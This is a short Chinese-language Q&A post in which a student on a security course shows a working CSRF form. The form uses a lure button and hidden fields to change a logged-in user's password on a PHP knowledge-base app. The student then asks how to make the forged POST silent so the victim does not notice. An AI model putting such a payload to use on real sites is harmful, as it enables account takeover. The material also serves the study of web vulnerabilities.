【发布时间】:2020-12-18 19:59:53
【问题描述】:
我正在学习网络安全课程,我们的一项任务是找出开源项目中的安全漏洞。
我正在从事的这个项目似乎容易受到 CSRF 的影响。我构建了以下攻击,我在其中欺骗用户单击包含以下内容的链接:
<form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post">
<input type="hidden" value="hacked" name="password1" size="20" maxlength="20" />
<input type="hidden" value="hacked" name="password2" size="20" maxlength="20" />
<input type="submit" name="submit" value="Click here for a new Camry!!" />
</form>
当用户当前登录站点时,这种攻击会起作用并更改站点的密码。但是,页面的结果会呈现给最终用户。我尝试了各种方法来“安静地”发布表单(基于 PHP 的方法和基于 JS 的方法),但无济于事。
谁能提供一些指导,或许可以为我指出正确的方向,是否可以静默 POST 到另一个网站?
【问题讨论】:
标签: security